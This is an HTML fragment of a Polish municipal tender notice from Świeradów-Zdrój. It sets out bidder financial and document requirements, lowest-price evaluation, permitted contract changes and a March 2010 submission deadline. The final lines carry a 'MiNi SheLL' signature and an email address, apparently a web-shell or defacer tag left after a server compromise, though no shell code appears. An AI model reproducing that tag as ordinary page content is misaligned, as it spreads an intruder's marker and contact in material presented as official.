<ul class="kh_indent_1"><li><p>Zadanie nr  1 .Warunek 6 Wykonawca zanjduje się w sytuacji ekonomicznej i finansowej umożliwiającej zrealizowanie zamówienia tj. Wykonawca posiada środki finansowe lub zdolność kredytową, w kwocie nie mniejszej niż  30 000,00 PLN (trzydzieści tysięcy złotych)  . Wykonawca spełnia warunek nr 6 jeżeli  przedłoży dokumenty potwierdzające posiadanie środków finansowych lub zdolności kredytowej, w kwocie nie mniejszej niż 30 000,00 PLN (trzydzieści tysięcy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany przedmiotu umowy, umówionego terminu wykonania zamówienia lub wysokości wynagrodzenia mogą nastąpić w przypadku wystąpienia jednej z poniższych okoliczności: 
a)ograniczenia zakresu usługi w związku z wystąpieniem sytuacji o której mowa w § 5 ust. 2,
b) z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno-gospodarczych lub z innych powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę, 
c)zmiana postanowień niniejszej umowy w przypadku zmiany powszechnie obowiązującego prawa, 
d) w przypadku zaistnienia niesprzyjających i nietypowych warunków atmosferycznych dla okresu i miejsca wykonywanych usługi, które powodują konieczność zmiany terminu wykonania usługi,
e) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zmawiającego, 
f) z powodu działań osób trzecich uniemożliwiających wykonanie usługi, które to działania nie są konsekwencją winy którejkolwiek ze stron.,
ł) zmiana danych związanych z obsługą administracyjną umowy np. zmiana rachunku bankowego,
n) zmiana w zakresie dokumentowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um-swieradow.bip.pbox.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój pokój 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 12:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój sekretariat 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com